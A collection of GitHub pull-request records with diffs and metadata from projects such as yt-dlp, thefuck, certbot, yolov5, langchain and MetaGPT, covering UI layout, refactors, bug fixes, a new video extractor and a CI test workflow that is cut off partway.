Past chat histories in a side bar on desktop | diff --git a/css/main.css b/css/main.css
index 653da3ee99..3d34a56412 100644
--- a/css/main.css
+++ b/css/main.css
@@ -660,6 +660,20 @@ div.svelte-362y77>*, div.svelte-362y77>.form>* {
margin-top: var(--layout-gap);
}
+/* ----------------------------------------------
+ Past chat histories in a side bar on desktop
+---------------------------------------------- */
+@media screen and (width >= 1327px) {
+ #past-chats-row {
+ position: absolute;
+ top: 16px;
+ left: 0;
+ width: calc(0.5*(var(--document-width) - 880px - 120px - 16px*2));
+ max-width: 300px;
+ margin-left: calc(-0.5*(var(--document-width) - 880px - 14px - 16px * 2));
+ }
+}
+
/* ----------------------------------------------
Keep dropdown menus above errored components
---------------------------------------------- */
diff --git a/js/main.js b/js/main.js
index 60f4bf3b38..f63327cef7 100644
--- a/js/main.js
+++ b/js/main.js
@@ -385,3 +385,15 @@ new ResizeObserver(updateCssProperties)
.observe(document.querySelector("#chat-input textarea"));
window.addEventListener("resize", updateCssProperties);
+
+//------------------------------------------------
+// Keep track of the display width to position the past
+// chats dropdown on desktop
+//------------------------------------------------
+function updateDocumentWidth() {
+ var updatedWidth = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
+ document.documentElement.style.setProperty("--document-width", updatedWidth + "px");
+}
+
+updateDocumentWidth();
+window.addEventListener("resize", updateDocumentWidth);
diff --git a/modules/ui_chat.py b/modules/ui_chat.py
index 76c7d5ff27..1713a39dce 100644
--- a/modules/ui_chat.py
+++ b/modules/ui_chat.py
@@ -63,17 +63,21 @@ def create_ui():
shared.gradio['send-chat-to-default'] = gr.Button('Send to default')
shared.gradio['send-chat-to-notebook'] = gr.Button('Send to notebook')
- with gr.Row(elem_id='past-chats-row'):
- shared.gradio['unique_id'] = gr.Dropdown(label='Past chats', elem_classes=['slim-dropdown'], interactive=not mu)
- shared.gradio['rename_chat'] = gr.Button('Rename', elem_classes='refresh-button', interactive=not mu)
- shared.gradio['delete_chat'] = gr.Button('🗑️', elem_classes='refresh-button', interactive=not mu)
- shared.gradio['delete_chat-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
- shared.gradio['delete_chat-confirm'] = gr.Button('Confirm', variant='stop', visible=False, elem_classes='refresh-button')
-
- with gr.Row(elem_id='rename-row'):
- shared.gradio['rename_to'] = gr.Textbox(label='Rename to:', placeholder='New name', visible=False, elem_classes=['no-background'])
- shared.gradio['rename_to-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
- shared.gradio['rename_to-confirm'] = gr.Button('Confirm', visible=False, elem_classes='refresh-button')
+ with gr.Row(elem_id='past-chats-row', elem_classes=['pretty_scrollbar']):
+ with gr.Column():
+ with gr.Row():
+ shared.gradio['unique_id'] = gr.Dropdown(label='Past chats', elem_classes=['slim-dropdown'], interactive=not mu)
+
+ with gr.Row():
+ shared.gradio['delete_chat'] = gr.Button('🗑️', elem_classes='refresh-button', interactive=not mu)
+ shared.gradio['delete_chat-confirm'] = gr.Button('Confirm', variant='stop', visible=False, elem_classes='refresh-button')
+ shared.gradio['delete_chat-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
+ shared.gradio['rename_chat'] = gr.Button('Rename', elem_classes='refresh-button', interactive=not mu)
+
+ with gr.Row(elem_id='rename-row'):
+ shared.gradio['rename_to'] = gr.Textbox(label='Rename to:', placeholder='New name', visible=False, elem_classes=['no-background'])
+ shared.gradio['rename_to-confirm'] = gr.Button('Confirm', visible=False, elem_classes='refresh-button')
+ shared.gradio['rename_to-cancel'] = gr.Button('Cancel', visible=False, elem_classes='refresh-button')
with gr.Row():
shared.gradio['start_with'] = gr.Textbox(label='Start reply with', placeholder='Sure thing!', value=shared.settings['start_with'])
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5098 | 2023-12-27T15:22:13Z | 2024-01-09T04:57:29Z | 2024-01-09T04:57:29Z | 2024-01-17T22:53:49Z | 1,060 | oobabooga/text-generation-webui | 26,428 | |
Decoupled Model-View-Controller example | diff --git a/mvc.py b/mvc.py
index 8087bdab..7df613fc 100644
--- a/mvc.py
+++ b/mvc.py
@@ -1,60 +1,121 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
-
class Model(object):
+ def __iter__(self):
+ raise NotImplementedError
+
+ def get(self, item):
+ """Returns an an object with a .items() call method
+ that iterates over key,value pairs of its information."""
+ raise NotImplementedError
+
+ @property
+ def item_type(self):
+ raise NotImplementedError
+
+
+
+class ProductModel(Model):
+
+ class Price(float):
+ """A polymorphic way to pass a float with a particular __str__ functionality."""
+ def __str__(self):
+ first_digits_str = str(round(self,2))
+ try:
+ dot_location = first_digits_str.index('.')
+ except ValueError:
+ return (first_digits_str + '.00')
+ else:
+ return (first_digits_str +
+ '0'*(3 + dot_location - len(first_digits_str)))
products = {
- 'milk': {'price': 1.50, 'quantity': 10},
- 'eggs': {'price': 0.20, 'quantity': 100},
- 'cheese': {'price': 2.00, 'quantity': 10}
+ 'milk': {'price': Price(1.50), 'quantity': 10},
+ 'eggs': {'price': Price(0.20), 'quantity': 100},
+ 'cheese': {'price': Price(2.00), 'quantity': 10}
}
+ item_type = 'product'
+
+ def __iter__(self):
+ for item in self.products:
+ yield item
+
+ def get(self, product):
+ try:
+ return self.products[product]
+ except KeyError as e:
+ raise KeyError((str(e) + " not in the model's item list."))
class View(object):
+ def show_item_list(self, item_type, item_list):
+ raise NotImplementedError
- def product_list(self, product_list):
- print('PRODUCT LIST:')
- for product in product_list:
- print(product)
- print('')
+ def show_item_information(self, item_type, item_name, item_info):
+ """Will look for item information by iterating over key,value pairs
+ yielded by item_info.items()"""
+ raise NotImplementedError
- def product_information(self, product, product_info):
- print('PRODUCT INFORMATION:')
- print('Name: %s, Price: %.2f, Quantity: %d\n' %
- (product.title(), product_info.get('price', 0),
- product_info.get('quantity', 0)))
+ def item_not_found(self, item_type, item_name):
+ raise NotImplementedError
- def product_not_found(self, product):
- print('That product "%s" does not exist in the records' % product)
+class ConsoleView(View):
+ def show_item_list(self, item_type, item_list):
+ print(item_type.upper() + ' LIST:')
+ for item in item_list:
+ print(item)
+ print('')
-class Controller(object):
+ @staticmethod
+ def capitalizer(string):
+ return string[0].upper() + string[1:].lower()
- def __init__(self):
- self.model = Model()
- self.view = View()
+ def show_item_information(self, item_type, item_name, item_info):
+ print(item_type.upper() + ' INFORMATION:')
+ printout = 'Name: %s' % item_name
+ for key, value in item_info.items():
+ printout += (', ' + self.capitalizer(str(key)) + ': ' + str(value))
+ printout += '\n'
+ print(printout)
- def get_product_list(self):
- product_list = self.model.products.keys()
- self.view.product_list(product_list)
+ def item_not_found(self, item_type, item_name):
+ print('That %s "%s" does not exist in the records' % (item_type, item_name))
+
+
+class Controller(object):
- def get_product_information(self, product):
- product_info = self.model.products.get(product, None)
- if product_info is not None:
- self.view.product_information(product, product_info)
+ def __init__(self, model, view):
+ self.model = model
+ self.view = view
+
+ def show_items(self):
+ items = list(self.model)
+ item_type = self.model.item_type
+ self.view.show_item_list(item_type, items)
+
+ def show_item_information(self, item_name):
+ try:
+ item_info = self.model.get(item_name)
+ except:
+ item_type = self.model.item_type
+ self.view.item_not_found(item_type, item_name)
else:
- self.view.product_not_found(product)
+ item_type = self.model.item_type
+ self.view.show_item_information(item_type, item_name, item_info)
if __name__ == '__main__':
- controller = Controller()
- controller.get_product_list()
- controller.get_product_information('cheese')
- controller.get_product_information('eggs')
- controller.get_product_information('milk')
- controller.get_product_information('arepas')
+ model = ProductModel()
+ view = ConsoleView()
+ controller = Controller(model, view)
+ controller.show_items()
+ controller.show_item_information('cheese')
+ controller.show_item_information('eggs')
+ controller.show_item_information('milk')
+ controller.show_item_information('arepas')
### OUTPUT ###
# PRODUCT LIST:
| Decoupled the Controller from the Model and the View. Controllers, models, and views only know about their abstract interfaces.
Controller now takes a concrete implementation of a model and a view during initialization. Besides the base Model and View classes that guarantee their services, for this example there is a ProductModel and a ConsoleView to serve as their concrete implementations.
| https://api.github.com/repos/faif/python-patterns/pulls/114 | 2016-01-30T21:14:56Z | 2016-01-31T17:33:47Z | 2016-01-31T17:33:47Z | 2016-01-31T17:33:48Z | 1,294 | faif/python-patterns | 33,516 |
fix LR bug | diff --git a/train.py b/train.py
index e10d5b9b1e4..513abb02c40 100644
--- a/train.py
+++ b/train.py
@@ -113,6 +113,12 @@ def train(hyp, tb_writer, opt, device):
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
print('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
+
+ # Scheduler https://arxiv.org/pdf/1812.01187.pdf
+ lf = lambda x: (((1 + math.cos(x * math.pi / epochs)) / 2) ** 1.0) * 0.8 + 0.2 # cosine
+ scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
+ # https://discuss.pytorch.org/t/a-problem-occured-when-resuming-an-optimizer/28822
+ # plot_lr_scheduler(optimizer, scheduler, epochs)
# Load Model
with torch_distributed_zero_first(rank):
@@ -158,12 +164,6 @@ def train(hyp, tb_writer, opt, device):
if mixed_precision:
model, optimizer = amp.initialize(model, optimizer, opt_level='O1', verbosity=0)
- # Scheduler https://arxiv.org/pdf/1812.01187.pdf
- lf = lambda x: (((1 + math.cos(x * math.pi / epochs)) / 2) ** 1.0) * 0.8 + 0.2 # cosine
- scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
- # https://discuss.pytorch.org/t/a-problem-occured-when-resuming-an-optimizer/28822
- # plot_lr_scheduler(optimizer, scheduler, epochs)
-
# DP mode
if device.type != 'cpu' and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
| submit #300
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Optimization process in YOLOv5 training updated with better scheduler initialization sequence.
### 📊 Key Changes
- Relocated the learning rate scheduler initialization in the `train.py` script.
- Removed the scheduler initialization from after model and optimizer are potentially wrapped with AMP (Automatic Mixed Precision).
### 🎯 Purpose & Impact
- **Purpose:** The change ensures the learning rate scheduler is set up before AMP wrapping, which can resolve potential conflicts or issues when resuming from checkpoints.
- **Impact:** This update could provide users with a more stable and consistent training experience by preventing potential bugs related to learning rate scheduling when using mixed precision training. It should be transparent to end-users but improves the robustness of the training code. | https://api.github.com/repos/ultralytics/yolov5/pulls/565 | 2020-07-30T10:58:38Z | 2020-07-30T17:48:21Z | 2020-07-30T17:48:21Z | 2024-01-19T21:31:17Z | 467 | ultralytics/yolov5 | 25,131 |
pipe default key | diff --git a/libs/langchain/langchain/schema/runnable/base.py b/libs/langchain/langchain/schema/runnable/base.py
index afce1201e184cd..51365bd0e1f82c 100644
--- a/libs/langchain/langchain/schema/runnable/base.py
+++ b/libs/langchain/langchain/schema/runnable/base.py
@@ -992,6 +992,7 @@ def configurable_fields(
def configurable_alternatives(
self,
which: ConfigurableField,
+ default_key: str = "default",
**kwargs: Runnable[Input, Output],
) -> RunnableSerializable[Input, Output]:
from langchain.schema.runnable.configurable import (
@@ -999,7 +1000,7 @@ def configurable_alternatives(
)
return RunnableConfigurableAlternatives(
- which=which, default=self, alternatives=kwargs
+ which=which, default=self, alternatives=kwargs, default_key=default_key
)
| https://api.github.com/repos/langchain-ai/langchain/pulls/11788 | 2023-10-14T00:24:13Z | 2023-10-14T07:39:24Z | 2023-10-14T07:39:24Z | 2023-10-14T07:39:25Z | 207 | langchain-ai/langchain | 43,337 | |
[youtube] Enforce UTC and use utcnow() in `datetime_from_str` | diff --git a/yt_dlp/extractor/youtube.py b/yt_dlp/extractor/youtube.py
index d8b4ad25867..335b8d2576c 100644
--- a/yt_dlp/extractor/youtube.py
+++ b/yt_dlp/extractor/youtube.py
@@ -373,7 +373,7 @@ def _initialize_pref(self):
pref = dict(compat_urlparse.parse_qsl(pref_cookie.value))
except ValueError:
self.report_warning('Failed to parse user PREF cookie' + bug_reports_message())
- pref.update({'hl': 'en'})
+ pref.update({'hl': 'en', 'tz': 'UTC'})
self._set_cookie('.youtube.com', name='PREF', value=compat_urllib_parse_urlencode(pref))
def _real_initialize(self):
@@ -412,8 +412,9 @@ def _extract_api_key(self, ytcfg=None, default_client='web'):
def _extract_context(self, ytcfg=None, default_client='web'):
context = get_first(
(ytcfg, self._get_default_ytcfg(default_client)), 'INNERTUBE_CONTEXT', expected_type=dict)
- # Enforce language for extraction
- traverse_obj(context, 'client', expected_type=dict, default={})['hl'] = 'en'
+ # Enforce language and tz for extraction
+ client_context = traverse_obj(context, 'client', expected_type=dict, default={})
+ client_context.update({'hl': 'en', 'timeZone': 'UTC', 'utcOffsetMinutes': 0})
return context
_SAPISID = None
@@ -729,7 +730,8 @@ def _extract_time_text(self, renderer, *path_list):
timestamp = (
unified_timestamp(text) or unified_timestamp(
self._search_regex(
- (r'(?:.+|^)(?:live|premieres|ed|ing)(?:\s*on)?\s*(.+\d)', r'\w+[\s,\.-]*\w+[\s,\.-]+20\d{2}'), text.lower(), 'time text', default=None)))
+ (r'(?:.+|^)(?:live|premieres|ed|ing)(?:\s*on)?\s*(.+\d)', r'\w+[\s,\.-]*\w+[\s,\.-]+20\d{2}'),
+ text.lower(), 'time text', default=None)))
if text and timestamp is None:
self.report_warning('Cannot parse localized time text' + bug_reports_message(), only_once=True)
diff --git a/yt_dlp/utils.py b/yt_dlp/utils.py
index 7adfb1e744d..6aa234f2a1e 100644
--- a/yt_dlp/utils.py
+++ b/yt_dlp/utils.py
@@ -3383,7 +3383,7 @@ def datetime_from_str(date_str, precision='auto', format='%Y%m%d'):
if precision == 'auto':
auto_precision = True
precision = 'microsecond'
- today = datetime_round(datetime.datetime.now(), precision)
+ today = datetime_round(datetime.datetime.utcnow(), precision)
if date_str in ('now', 'today'):
return today
if date_str == 'yesterday':
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [X] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [X] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [X] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [X] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [X] Bug fix
- [ ] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
From https://github.com/yt-dlp/yt-dlp/pull/2223
While investigation is needed for the `playerResponse` date issue, I think we should at least merge this. | https://api.github.com/repos/yt-dlp/yt-dlp/pulls/2402 | 2022-01-20T04:04:29Z | 2022-01-20T15:02:02Z | 2022-01-20T15:02:02Z | 2023-02-28T00:48:19Z | 721 | yt-dlp/yt-dlp | 8,181 |
Update ollama.py | diff --git a/llama_index/llms/ollama.py b/llama_index/llms/ollama.py
index a36f800445159..263f2b4f1b4c9 100644
--- a/llama_index/llms/ollama.py
+++ b/llama_index/llms/ollama.py
@@ -23,9 +23,7 @@
class Ollama(CustomLLM):
- base_url: str = "http://localhost:11434"
- """Base url the model is hosted under."""
-
+ base_url: str = Field(description="Base url the model is hosted under.")
model: str = Field(description="The Ollama model to use.")
temperature: float = Field(description="The temperature to use for sampling.")
context_window: int = Field(
@@ -42,6 +40,7 @@ class Ollama(CustomLLM):
def __init__(
self,
model: str,
+ base_url: str = "http://localhost:11434",
temperature: float = 0.75,
additional_kwargs: Optional[Dict[str, Any]] = None,
context_window: int = DEFAULT_CONTEXT_WINDOW,
@@ -56,6 +55,7 @@ def __init__(
super().__init__(
model=model,
temperature=temperature,
+ base_url=base_url,
additional_kwargs=additional_kwargs or {},
context_window=context_window,
prompt_key=prompt_key,
|
# Description
Enable base_url default value to be overwritten
Fixes # (issue)
## Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] Added new unit/integration tests
- [ ] Added new notebook (that tests end-to-end)
- [x] I stared at the code and made sure it makes sense
# Suggested Checklist:
- [ ] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation
- [ ] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] New and existing unit tests pass locally with my changes
| https://api.github.com/repos/run-llama/llama_index/pulls/7839 | 2023-09-26T22:23:26Z | 2023-09-26T22:53:19Z | 2023-09-26T22:53:19Z | 2023-09-26T22:53:19Z | 322 | run-llama/llama_index | 6,842 |
Use correct Content-Types in headers. | diff --git a/acme/acme/client.py b/acme/acme/client.py
index de7eef2992b..6a648bb9209 100644
--- a/acme/acme/client.py
+++ b/acme/acme/client.py
@@ -495,6 +495,7 @@ def revoke(self, cert):
class ClientNetwork(object): # pylint: disable=too-many-instance-attributes
"""Client network."""
JSON_CONTENT_TYPE = 'application/json'
+ JOSE_CONTENT_TYPE = 'application/jose+json'
JSON_ERROR_CONTENT_TYPE = 'application/problem+json'
REPLAY_NONCE_HEADER = 'Replay-Nonce'
@@ -641,9 +642,10 @@ def _get_nonce(self, url):
self._add_nonce(self.head(url))
return self._nonces.pop()
- def post(self, url, obj, content_type=JSON_CONTENT_TYPE, **kwargs):
+ def post(self, url, obj, content_type=JOSE_CONTENT_TYPE, **kwargs):
"""POST object wrapped in `.JWS` and check response."""
data = self._wrap_in_jws(obj, self._get_nonce(url))
+ kwargs.setdefault('headers', {'Content-Type': content_type})
response = self._send_request('POST', url, data=data, **kwargs)
self._add_nonce(response)
return self._check_response(response, content_type=content_type)
diff --git a/acme/acme/client_test.py b/acme/acme/client_test.py
index 585576e2d0e..374f8954c47 100644
--- a/acme/acme/client_test.py
+++ b/acme/acme/client_test.py
@@ -630,6 +630,10 @@ def test_get(self):
self.send_request.assert_called_once_with(
'GET', 'http://example.com/', bar='baz')
+ def test_post_no_content_type(self):
+ self.content_type = self.net.JOSE_CONTENT_TYPE
+ self.assertEqual(self.checked_response, self.net.post('uri', self.obj))
+
def test_post(self):
# pylint: disable=protected-access
self.assertEqual(self.checked_response, self.net.post(
| This closes https://github.com/certbot/certbot/issues/3555
The content type for all posts requests is now `application/jose+json`, which is in compliance with the latest ACME spec. https://tools.ietf.org/html/draft-ietf-acme-acme-03
| https://api.github.com/repos/certbot/certbot/pulls/3566 | 2016-09-30T05:02:28Z | 2016-10-05T19:28:38Z | 2016-10-05T19:28:38Z | 2016-12-08T01:14:36Z | 470 | certbot/certbot | 2,894 |
[willow] new extractor | diff --git a/yt_dlp/extractor/extractors.py b/yt_dlp/extractor/extractors.py
index 4f9de71e27d..a6f1acb5654 100644
--- a/yt_dlp/extractor/extractors.py
+++ b/yt_dlp/extractor/extractors.py
@@ -1782,6 +1782,7 @@
WeiboMobileIE
)
from .weiqitv import WeiqiTVIE
+from .willow import WillowIE
from .wimtv import WimTVIE
from .whowatch import WhoWatchIE
from .wistia import (
diff --git a/yt_dlp/extractor/willow.py b/yt_dlp/extractor/willow.py
new file mode 100644
index 00000000000..4d3d62f9556
--- /dev/null
+++ b/yt_dlp/extractor/willow.py
@@ -0,0 +1,58 @@
+# coding: utf-8
+from ..utils import ExtractorError
+from .common import InfoExtractor
+
+
+class WillowIE(InfoExtractor):
+ _VALID_URL = r'https?://(www\.)?willow\.tv/videos/(?P<id>[0-9a-z-_]+)'
+ _GEO_COUNTRIES = ['US']
+
+ _TESTS = [{
+ 'url': 'http://willow.tv/videos/d5winning-moment-eng-vs-ind-streaming-online-4th-test-india-tour-of-england-2021',
+ 'info_dict': {
+ 'id': '169662',
+ 'display_id': 'd5winning-moment-eng-vs-ind-streaming-online-4th-test-india-tour-of-england-2021',
+ 'ext': 'mp4',
+ 'title': 'Winning Moment: 4th Test, England vs India',
+ 'thumbnail': 'https://aimages.willow.tv/ytThumbnails/6748_D5winning_moment.jpg',
+ 'duration': 233,
+ 'timestamp': 1630947954,
+ 'upload_date': '20210906',
+ 'location': 'Kennington Oval, London',
+ 'series': 'India tour of England 2021',
+ },
+ 'params': {
+ 'skip_download': True, # AES-encrypted m3u8
+ },
+ }, {
+ 'url': 'http://willow.tv/videos/highlights-short-ind-vs-nz-streaming-online-2nd-t20i-new-zealand-tour-of-india-2021',
+ 'only_matching': True,
+ }]
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+ webpage = self._download_webpage(url, video_id)
+ video_data = self._parse_json(self._html_search_regex(
+ r'var\s+data_js\s*=\s*JSON\.parse\(\'(.+)\'\)', webpage,
+ 'data_js'), video_id)
+
+ video = next((v for v in video_data.get('trending_videos') or []
+ if v.get('secureurl')), None)
+ if not video:
+ raise ExtractorError('No videos found')
+
+ formats = self._extract_m3u8_formats(video['secureurl'], video_id, 'mp4')
+ self._sort_formats(formats)
+
+ return {
+ 'id': str(video.get('content_id')),
+ 'display_id': video.get('video_slug'),
+ 'title': video.get('video_name') or self._html_search_meta('twitter:title', webpage),
+ 'formats': formats,
+ 'thumbnail': video.get('yt_thumb_url') or self._html_search_meta(
+ 'twitter:image', webpage, default=None),
+ 'duration': video.get('duration_seconds'),
+ 'timestamp': video.get('created_date'),
+ 'location': video.get('venue'),
+ 'series': video.get('series_name'),
+ }
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [ ] Improvement
- [x] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Extractor for willow.tv, which has both free and subscriber-only content. Only support for free videos was added as I am not a paid subscriber. | https://api.github.com/repos/yt-dlp/yt-dlp/pulls/1723 | 2021-11-19T21:51:55Z | 2021-11-20T04:03:43Z | 2021-11-20T04:03:43Z | 2021-11-20T04:03:43Z | 904 | yt-dlp/yt-dlp | 7,603 |
#433: Set env vars right in the aliases | diff --git a/tests/test_shells.py b/tests/test_shells.py
index 060419f49..1cea2fb98 100644
--- a/tests/test_shells.py
+++ b/tests/test_shells.py
@@ -50,8 +50,8 @@ def test_app_alias(self, shell):
assert 'alias fuck' in shell.app_alias('fuck')
assert 'alias FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines(['ls', 'rm'])
@@ -112,8 +112,8 @@ def test_app_alias(self, shell):
assert 'alias fuck' in shell.app_alias('fuck')
assert 'alias FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines(['ls', 'rm'])
@@ -193,8 +193,8 @@ def test_app_alias(self, shell):
assert 'function fuck' in shell.app_alias('fuck')
assert 'function FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines(['- cmd: ls', ' when: 1432613911',
@@ -252,8 +252,8 @@ def test_app_alias(self, shell):
assert 'alias fuck' in shell.app_alias('fuck')
assert 'alias FUCK' in shell.app_alias('FUCK')
assert 'thefuck' in shell.app_alias('fuck')
- assert 'TF_ALIAS' in shell.app_alias('fuck')
- assert 'PYTHONIOENCODING=utf-8' in shell.app_alias('fuck')
+ assert 'TF_ALIAS=fuck PYTHONIOENCODING' in shell.app_alias('fuck')
+ assert 'PYTHONIOENCODING=utf-8 thefuck' in shell.app_alias('fuck')
def test_get_history(self, history_lines, shell):
history_lines([': 1432613911:0;ls', ': 1432613916:0;rm'])
diff --git a/thefuck/shells.py b/thefuck/shells.py
index f78d25755..9bd7fd3a3 100644
--- a/thefuck/shells.py
+++ b/thefuck/shells.py
@@ -38,8 +38,8 @@ def to_shell(self, command_script):
return command_script
def app_alias(self, fuck):
- return "alias {0}='TF_ALIAS={0} PYTHONIOENCODING=utf-8 " \
- "eval $(thefuck $(fc -ln -1))'".format(fuck)
+ return "alias {0}='eval $(TF_ALIAS={0} PYTHONIOENCODING=utf-8 " \
+ "thefuck $(fc -ln -1))'".format(fuck)
def _get_history_file_name(self):
return ''
@@ -103,8 +103,8 @@ def _script_from_history(self, line):
class Bash(Generic):
def app_alias(self, fuck):
- return "TF_ALIAS={0} alias {0}='PYTHONIOENCODING=utf-8 " \
- "eval $(thefuck $(fc -ln -1));" \
+ return "alias {0}='eval " \
+ "$(TF_ALIAS={0} PYTHONIOENCODING=utf-8 thefuck $(fc -ln -1));" \
" history -r'".format(fuck)
def _parse_alias(self, alias):
@@ -152,7 +152,7 @@ def app_alias(self, fuck):
' set -l exit_code $status\n'
' set -l fucked_up_command $history[1]\n'
' env TF_ALIAS={0} PYTHONIOENCODING=utf-8'
- ' thefuck $fucked_up_command | read -l unfucked_command\n'
+ ' thefuck $fucked_up_command | read -l unfucked_command\n'
' if [ "$unfucked_command" != "" ]\n'
' eval $unfucked_command\n'
' if test $exit_code -ne 0\n'
@@ -203,9 +203,8 @@ def how_to_configure(self):
class Zsh(Generic):
def app_alias(self, fuck):
- return "TF_ALIAS={0}" \
- " alias {0}='PYTHONIOENCODING=utf-8 " \
- "eval $(thefuck $(fc -ln -1 | tail -n 1));" \
+ return "alias {0}='eval $(TF_ALIAS={0} PYTHONIOENCODING=utf-8" \
+ " thefuck $(fc -ln -1 | tail -n 1));" \
" fc -R'".format(fuck)
def _parse_alias(self, alias):
diff --git a/thefuck/types.py b/thefuck/types.py
index 89c9d862f..f58646588 100644
--- a/thefuck/types.py
+++ b/thefuck/types.py
@@ -281,4 +281,6 @@ def run(self, old_cmd):
if settings.alter_history:
shells.put_to_history(self.script)
# This depends on correct setting of PYTHONIOENCODING by the alias:
+ logs.debug(u'PYTHONIOENCODING: {}'.format(
+ os.environ.get('PYTHONIOENCODING', '>-not-set-<')))
print(self.script)
| Fix #433
| https://api.github.com/repos/nvbn/thefuck/pulls/434 | 2016-01-16T23:41:44Z | 2016-01-17T11:00:23Z | 2016-01-17T11:00:23Z | 2016-01-17T16:47:58Z | 1,460 | nvbn/thefuck | 30,838 |
feat: add github actions unittest | diff --git a/.github/workflows/unittest.yaml b/.github/workflows/unittest.yaml
new file mode 100644
index 000000000..565cdaead
--- /dev/null
+++ b/.github/workflows/unittest.yaml
@@ -0,0 +1,42 @@
+name: Python application test
+
+on:
+ workflow_dispatch:
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ # python-version: ['3.9', '3.10', '3.11']
+ python-version: ['3.9']
+
+ steps:
+ - uses: actions/checkout@v4
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v4
+ with:
+ python-version: ${{ matrix.python-version }}
+ - name: Install dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install -e.
+ npm install -g @mermaid-js/mermaid-cli
+ playwright install --with-deps chromium
+ - name: Test with pytest
+ run: |
+ pip install pytest pytest-asyncio pytest-cov pytest-html
+ export OPENAI_API_KEY="${{ secrets.OPENAI_API_KEY }}" OPENAI_API_MODEL="gpt-3.5-turbo-1106"
+ export PYPPETEER_EXECUTABLE_PATH="/usr/bin/chromium"
+ pytest tests/ --doctest-modules --junitxml=junit/test-results-${{ matrix.python-version }}.xml --cov=./metagpt/ --cov-report=xml:cov.xml --cov-report=html:htmlcov
+ coverage report -m
+ - name: Upload pytest test results
+ uses: actions/upload-artifact@v3
+ with:
+ name: pytest-results-${{ matrix.python-version }}
+ path: |
